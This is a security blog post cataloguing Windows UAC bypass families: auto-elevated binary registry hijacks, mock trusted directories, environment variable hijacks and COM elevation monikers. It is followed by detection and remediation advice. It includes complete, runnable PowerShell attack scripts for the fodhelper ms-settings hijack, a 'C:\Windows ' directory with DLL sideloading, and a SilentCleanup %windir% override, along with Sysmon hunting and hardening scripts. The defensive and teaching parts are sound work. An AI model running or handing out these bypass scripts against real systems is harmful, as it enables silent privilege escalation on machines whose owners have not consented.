BIPI

UAC Bypass Techniques in 2024: Auto-Elevation and Trusted Directories

Cybersecurity

UAC is a speedbump, not a security boundary. A working catalogue of auto-elevation, mock trusted directories, environment variable hijacks, and COM elevation bypasses for medium-to-high integrity jumps.

By Arjun Raghavan, Security & Systems Lead, BIPI · April 11, 2025 · 10 min read

#windows #uac #bypass #red-team #fodhelper

UAC is not a boundary

Microsoft has said this repeatedly: UAC is a convenience feature, not a security boundary, and it is excluded from the MSRC servicing criteria, so bypasses are not serviced as vulnerabilities. On the default setting ("Notify me only when programs try to make changes to my computer") it auto-elevates, without a prompt, binaries that are Windows-signed, sit in a trusted directory such as C:\Windows\System32, and carry autoElevate=true in their manifest. Nearly every UAC bypass abuses one of those binaries, or an elevated COM class that is auto-approved under the same rules, from a medium-integrity process of a user who is already a member of the local Administrators group.

Family 1: auto-elevated binary hijacks

  • fodhelper.exe resolves the ms-settings: protocol through HKCU\Software\Classes\ms-settings\Shell\Open\command; an empty DelegateExecute value plus an attacker command in (Default) runs that command at high integrity
  • computerdefaults.exe uses the same ms-settings handler, so the same key works unchanged
  • eventvwr.exe looked up HKCU\Software\Classes\mscfile\shell\open\command; fixed in Windows 10 1703, but the same pattern survives in other binaries
  • sdclt.exe and slui.exe via HKCU App Paths (control.exe) and exefile/Folder shell\open\command hijacks
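The ms-settings hijack from the first bullet as it is typed in a lab, an added example that is not from the original post. It assumes a medium-integrity PowerShell session belonging to a member of the local Administrators group with UAC at its default level; the payload path is a placeholder.

```powershell
# Added lab example, not from the original post. Run from a medium-integrity
# PowerShell session of a local admin with UAC at its default level.
$Key     = 'HKCU:\Software\Classes\ms-settings\Shell\Open\command'
$Payload = 'C:\Windows\System32\cmd.exe'   # placeholder: whatever sits here runs at high integrity

function Get-IntegrityLabel {
    # Pulls the mandatory label line out of "whoami /groups" (e.g. "Medium Mandatory Level").
    (whoami /groups) -match 'Mandatory Level' -replace '^\s*Mandatory Label\\', '' -replace '\s{2,}.*$', ''
}

# 1. Plant the per-user protocol handler. HKCU\Software\Classes is merged into HKCR
#    ahead of HKLM, so fodhelper's lookup for ms-settings: finds this key first.
#    An empty DelegateExecute value tells the shell to skip the COM handler and run
#    the (Default) command string instead.
New-Item -Path $Key -Force | Out-Null
Set-ItemProperty -Path $Key -Name '(Default)'       -Value $Payload
Set-ItemProperty -Path $Key -Name 'DelegateExecute' -Value ''

# 2. Launch the auto-elevated binary. No consent prompt appears because fodhelper.exe
#    is Windows-signed, lives in System32 and carries autoElevate=true.
"Launcher runs at: $(Get-IntegrityLabel)"
Start-Process -FilePath "$env:SystemRoot\System32\fodhelper.exe"
Start-Sleep -Seconds 3

# 3. Remove the key. It is the single highest-fidelity artefact defenders look for.
Remove-Item -Path 'HKCU:\Software\Classes\ms-settings' -Recurse -Force
```

In the cmd.exe window that fodhelper spawns, `whoami /groups | findstr Mandatory` should report High Mandatory Level while the launching session still reports Medium. With UAC set to Always Notify the same script produces a consent prompt instead, which is the whole point of the Remediation section.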

Family 2: mock trusted directories

Windows treats C:\Windows\System32 as a trusted directory when deciding whether a binary may auto-elevate. Creating C:\Windows \System32\ (note the space after Windows) yields a directory that the trusted-directory check mistakes for the real one once its own path normalisation has swallowed the space; the trailing-space directory itself has to be created through the \\?\ path prefix, because ordinary Win32 normalisation strips trailing spaces from the last path component. The binary placed there still has to be a Microsoft-signed auto-elevating one; the unsigned code arrives as a DLL planted beside it, which the elevated copy sideloads. Used in older bypasses and reported as still working on unpatched 21H2 builds, so test it in the lab rather than assume either way.
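Creating the mock directory and staging the signed binary and its sideloaded DLL, as an added example that is not from the original post. The binary/DLL pair and the attacker DLL path are placeholder assumptions: pick a Windows-signed autoElevate binary whose import your DLL satisfies on the build under test. All file operations go through P/Invoke with the \\?\ prefix so that neither the PowerShell provider nor .NET path normalisation can quietly turn "C:\Windows " back into C:\Windows.

```powershell
# Added example, not from the original post. Placeholders are marked as such.
$Sig = @'
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern bool CreateDirectoryW(string lpPathName, IntPtr lpSecurityAttributes);
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern bool CopyFileW(string lpExistingFileName, string lpNewFileName, bool bFailIfExists);
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern bool DeleteFileW(string lpFileName);
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern bool RemoveDirectoryW(string lpPathName);
'@
$K32 = Add-Type -MemberDefinition $Sig -Name 'Native' -Namespace 'MockDir' -PassThru

$TrustedExe = 'autoelevate.exe'              # placeholder: a Windows-signed autoElevate binary in System32
$PlantedDll = 'sideload.dll'                 # placeholder: a DLL that binary imports by name
$AttackerDll = 'C:\Users\Public\sideload.dll' # placeholder: your DLL, already on disk
$MockRoot   = '\\?\C:\Windows '              # trailing space; only reachable through the \\?\ prefix
$Mock       = "$MockRoot\System32"

function Assert-Native([string]$What, [bool]$Ok) {
    if (-not $Ok) { throw "$What failed: Win32 error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())" }
}

# Build C:\Windows \System32 and stage the pair next to each other.
Assert-Native 'CreateDirectory(Windows )' ($K32::CreateDirectoryW($MockRoot, [IntPtr]::Zero))
Assert-Native 'CreateDirectory(System32)' ($K32::CreateDirectoryW($Mock, [IntPtr]::Zero))
Assert-Native 'CopyFile(exe)' ($K32::CopyFileW("$env:SystemRoot\System32\$TrustedExe", "$Mock\$TrustedExe", $false))
Assert-Native 'CopyFile(dll)' ($K32::CopyFileW($AttackerDll, "$Mock\$PlantedDll", $false))

# Launch the copy. "Windows " is a middle component here, so CreateProcess keeps the
# space, while the elevation check normalises the path and sees C:\Windows\System32.
cmd.exe /c start "" "C:\Windows \System32\$TrustedExe"
Start-Sleep -Seconds 3

# Cleanup has to use the same prefix; Remove-Item would not see the directory.
Assert-Native 'DeleteFile(exe)' ($K32::DeleteFileW("$Mock\$TrustedExe"))
Assert-Native 'DeleteFile(dll)' ($K32::DeleteFileW("$Mock\$PlantedDll"))
Assert-Native 'RemoveDirectory(System32)' ($K32::RemoveDirectoryW($Mock))
Assert-Native 'RemoveDirectory(Windows )' ($K32::RemoveDirectoryW($MockRoot))
```

A build that has hardened the check will either prompt or refuse to elevate the copy; the script leaves nothing behind either way, which matters because a stray "C:\Windows " directory is itself a strong hunting signal.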

Family 3: environment variable hijacks

  • %SystemRoot% and %windir% are expanded from the caller's environment block, and values under HKCU\Environment are merged into that block for every process the user starts, including auto-elevated ones
  • wsreset.exe checks SystemRoot before launching child binaries
  • Set the variable under HKCU\Environment, trigger an auto-elevated consumer of it (the SilentCleanup scheduled task, which runs %windir%\system32\cleanmgr.exe with highest privileges, is the best-known one), and the child path resolves to your binary
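The %windir% hijack carried through against the SilentCleanup task, as an added example that is not from the original post. It assumes the task exists and is enabled (it ships with Windows 10 and 11 under \Microsoft\Windows\DiskCleanup) and that the current user is a local admin; the payload is a placeholder that just prints the integrity level.

```powershell
# Added example, not from the original post.
$Task = '\Microsoft\Windows\DiskCleanup\SilentCleanup'

# The task action is "%windir%\system32\cleanmgr.exe /autoclean /d %systemdrive%" and is
# expanded against the user's environment, where HKCU\Environment\windir wins over the
# machine value. Ending the override with "REM " turns the rest of the action
# (\system32\cleanmgr.exe ...) into a comment, and the first command removes the
# override again so nothing is left behind even if later steps fail.
$Payload  = 'whoami /groups | findstr Mandatory'   # placeholder payload, runs at high integrity
$Override = "cmd.exe /K reg delete HKCU\Environment /v windir /f && $Payload && REM "

Set-ItemProperty -Path 'HKCU:\Environment' -Name 'windir' -Value $Override -Type String

# /I runs the task immediately, ignoring its schedule and conditions.
schtasks.exe /Run /TN $Task /I
Start-Sleep -Seconds 5

# If the override is still there the task never fired (disabled, or a hardened build);
# remove it rather than leave the user with a broken %windir%.
if (Get-ItemProperty -Path 'HKCU:\Environment' -Name 'windir' -ErrorAction SilentlyContinue) {
    Remove-ItemProperty -Path 'HKCU:\Environment' -Name 'windir'
    throw 'SilentCleanup did not consume the override; cleaned up.'
}
```

The cmd.exe window the task opens should show High Mandatory Level. Note the detection angle: nothing under HKCU\Software\Classes is touched, so a rule keyed on the ms-settings key never fires; the artefacts are a Sysmon 13 on HKCU\Environment\windir and a cmd.exe child of svchost.exe (the Task Scheduler host) at high integrity.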

Family 4: COM elevation moniker abuse

CoGetObject with the moniker Elevation:Administrator!new:{CLSID} asks the AppInfo service to host a COM class in an elevated surrogate. A class is eligible when its CLSID registration has an Elevation subkey with Enabled=1, and the prompt is skipped when the class is on the COM auto-approval list and the calling process passes the same trusted-caller check as an autoElevate binary, which UACME satisfies by spoofing the process's PEB image path to look like explorer.exe. The classic target is CMSTPLUA ({3E5FC7F9-9A51-4367-9063-A120244FBEC7}): its ICMLuaUtil interface exposes ShellExec, so the elevated instance will launch any binary you name. UACME method 41 implements it, and Sharp-SUACME ports the implementation to C#.
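A read-only audit of which COM classes the moniker can host elevated and which of them are auto-approved, as an added example that is not from the original post. It assumes the auto-approval list lives at HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\UAC\COMAutoApprovalList with one DWORD value per CLSID; it runs no bypass.

```powershell
# Added example, not from the original post. Enumerates elevatable COM classes.
$AutoApproval = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\UAC\COMAutoApprovalList'
$Cmstplua     = '{3E5FC7F9-9A51-4367-9063-A120244FBEC7}'   # CMSTPLUA, exposes ICMLuaUtil::ShellExec

function Get-ElevatableComClass {
    # Eligibility for Elevation:Administrator is a registry property:
    # HKCR\CLSID\{guid}\Elevation\Enabled = 1. Auto-approval (no prompt for a
    # trusted-looking caller) is a second, separate list keyed by CLSID.
    Get-ChildItem -Path 'Registry::HKEY_CLASSES_ROOT\CLSID' -ErrorAction SilentlyContinue | ForEach-Object {
        $elev = Get-ItemProperty -Path (Join-Path $_.PSPath 'Elevation') -ErrorAction SilentlyContinue
        if (-not $elev -or $elev.Enabled -ne 1) { return }
        $clsid  = $_.PSChildName
        $props  = Get-ItemProperty -Path $_.PSPath
        $server = (Get-ItemProperty -Path (Join-Path $_.PSPath 'InprocServer32') -ErrorAction SilentlyContinue).'(default)'
        [pscustomobject]@{
            CLSID        = $clsid
            Name         = $props.'(default)'
            Server       = $server
            AutoApproved = [bool](Get-ItemProperty -Path $AutoApproval -Name $clsid -ErrorAction SilentlyContinue)
            KnownAbuse   = ($clsid -ieq $Cmstplua)
        }
    }
}

Get-ElevatableComClass | Sort-Object AutoApproved, KnownAbuse -Descending | Format-Table -AutoSize
```

The AutoApproved column is the one to read: a class that is elevatable but not auto-approved still raises a consent prompt, so it is of no use for a silent bypass. Expect CMSTPLUA to appear with both columns set on a default install.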

Tooling

  • UACME by hfiref0x: 70+ documented methods with source
  • Sharp-SUACME: C# port of the most reliable methods
  • PowerUp Invoke-WScriptUACBypass for legacy lab targets
  • Metasploit bypassuac_fodhelper module for quick PoC

Detection

Sysmon Event 12 (key create) and 13 (value set) under HKCU\Software\Classes\ms-settings is a near-zero-FP signal: no legitimate software registers a per-user handler for that protocol. The process tree where fodhelper.exe or computerdefaults.exe, running at high integrity with no consent prompt, spawns cmd.exe or powershell.exe is the canonical hit. Most EDR rules key on the registry write rather than on the elevated launch, which is why attackers shift to variants that never touch a well-known key: the COM elevation moniker, DLL sideloading from a mock directory, or an environment variable hijack.
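A hunting script over the Sysmon operational log for both signals, as an added example that is not from the original post. It assumes Sysmon is installed with a configuration that logs registry events (12/13) under HKCU\Software\Classes and process creation (1) with the IntegrityLevel field; the key and binary lists are the ones named on this page.

```powershell
# Added example, not from the original post. Run as an administrator (log read access).
$SysmonLog   = 'Microsoft-Windows-Sysmon/Operational'
# Sysmon writes per-user keys as HKU\<SID>\Software\Classes\...; -match is case-insensitive.
$HijackKeys  = 'HKU\\S-1-5-[\d-]+\\Software\\Classes\\(ms-settings|mscfile|exefile|Folder)\\'
$AutoElevate = '\\(fodhelper|computerdefaults|eventvwr|sdclt|slui)\.exe$'
$Shells      = '\\(cmd|powershell|pwsh|wscript|cscript|mshta|rundll32)\.exe$'

function ConvertFrom-SysmonEvent {
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    # Flattens the <Data Name="..."> elements of EventData into one object.
    $h = @{ Id = $Event.Id; Time = $Event.TimeCreated }
    foreach ($d in ([xml]$Event.ToXml()).Event.EventData.Data) { $h[$d.Name] = $d.'#text' }
    [pscustomobject]$h
}

function Find-UacBypassArtefacts {
    param([int]$Hours = 24)
    $since = (Get-Date).AddHours(-$Hours)

    # Signal 1: a write to one of the hijackable per-user handler keys.
    Get-WinEvent -FilterHashtable @{ LogName = $SysmonLog; Id = 12, 13; StartTime = $since } -ErrorAction SilentlyContinue |
        ForEach-Object { ConvertFrom-SysmonEvent $_ } |
        Where-Object { $_.TargetObject -match $HijackKeys } |
        ForEach-Object { [pscustomobject]@{ Time = $_.Time; Signal = 'RegistryHijack'; Detail = "$($_.Image) -> $($_.TargetObject)" } }

    # Signal 2: an auto-elevating binary spawning a shell at high integrity.
    Get-WinEvent -FilterHashtable @{ LogName = $SysmonLog; Id = 1; StartTime = $since } -ErrorAction SilentlyContinue |
        ForEach-Object { ConvertFrom-SysmonEvent $_ } |
        Where-Object { $_.ParentImage -match $AutoElevate -and $_.Image -match $Shells -and $_.IntegrityLevel -eq 'High' } |
        ForEach-Object { [pscustomobject]@{ Time = $_.Time; Signal = 'ElevatedChild'; Detail = "$($_.ParentImage) -> $($_.CommandLine)" } }
}

Find-UacBypassArtefacts -Hours 24 | Sort-Object Time | Format-Table -AutoSize -Wrap
```

Signal 2 is the one that survives the "fileless" variants: the COM moniker route shows up as a high-integrity child of dllhost.exe rather than fodhelper.exe, so extend $AutoElevate with dllhost.exe if you are hunting for that family as well, and expect some tuning since dllhost hosts plenty of legitimate elevated COM work.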

Remediation

  • Set UAC to Always Notify (ConsentPromptBehaviorAdmin=2 with PromptOnSecureDesktop=1) on admin workstations; that disables auto-elevation, so every family above needs a click
  • Remove local admin from interactive users: LAPS for the built-in administrator account, PAM or just-in-time elevation for everything else. Without an admin token there is nothing for a UAC bypass to elevate to
  • Defender ASR rules "Block credential stealing from LSASS" and "Block process creations originating from PsExec and WMI commands" do not stop the bypass itself but cut off what usually follows it
  • Disable the Secondary Logon service (seclogon) where runas is not needed
  • Audit HKCU\Software\Classes for shell\open\command keys with an empty DelegateExecute value; legitimate per-user registrations point it at a real CLSID
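The host-side parts of that list applied to one workstation and the DelegateExecute audit, as an added example that is not from the original post. The ASR rule GUIDs are the published Defender identifiers; the local-admin removal is a directory and PAM change and is not scripted here. Run it elevated.

```powershell
# Added example, not from the original post. Run from an elevated PowerShell.
$Pol = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

function Set-UacAlwaysNotify {
    # Always Notify = consent prompt on the secure desktop for every elevation,
    # which disables autoElevate and with it every bypass family on this page.
    Set-ItemProperty -Path $Pol -Name 'EnableLUA'                  -Value 1 -Type DWord
    Set-ItemProperty -Path $Pol -Name 'ConsentPromptBehaviorAdmin' -Value 2 -Type DWord
    Set-ItemProperty -Path $Pol -Name 'PromptOnSecureDesktop'      -Value 1 -Type DWord
}

function Enable-PostBypassAsrRules {
    # Neither rule blocks the bypass; they block the credential theft and lateral
    # movement that normally follow a medium-to-high jump.
    $rules = @{
        '9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2' = 'Block credential stealing from LSASS'
        'd1e49aac-8f56-4280-b9ba-993a6d77406c' = 'Block process creations originating from PsExec and WMI commands'
    }
    foreach ($id in $rules.Keys) {
        Add-MpPreference -AttackSurfaceReductionRules_Ids $id -AttackSurfaceReductionRules_Actions Enabled
    }
}

function Disable-SecondaryLogon {
    Stop-Service -Name 'seclogon' -Force -ErrorAction SilentlyContinue
    Set-Service  -Name 'seclogon' -StartupType Disabled
}

function Find-DelegateExecuteHijack {
    # Per-user shell\open\command keys. An empty DelegateExecute is the bypass
    # signature; a real CLSID there is an ordinary application registration.
    Get-ChildItem -Path 'HKCU:\Software\Classes' -Recurse -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -ieq 'command' -and $_.Property -contains 'DelegateExecute' } |
        ForEach-Object {
            $p = Get-ItemProperty -Path $_.PSPath
            [pscustomobject]@{
                Key             = $_.Name
                Command         = $p.'(default)'
                DelegateExecute = $p.DelegateExecute
                Suspicious      = [string]::IsNullOrEmpty($p.DelegateExecute)
            }
        }
}

Set-UacAlwaysNotify
Enable-PostBypassAsrRules
Disable-SecondaryLogon
Find-DelegateExecuteHijack | Format-Table -AutoSize
```

The UAC level takes effect at the next logon; the ASR and service changes are immediate. Find-DelegateExecuteHijack only sees the hive of the user running it, so for a fleet sweep run it in each user's context or walk the loaded hives under HKU.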

By the numbers

  • 70+ UACME methods publicly documented
  • <5s from medium to high integrity via fodhelper
  • majority of bypasses defeated by Always Notify

Treat any local admin user as if UAC did not exist, because for an attacker it does not.
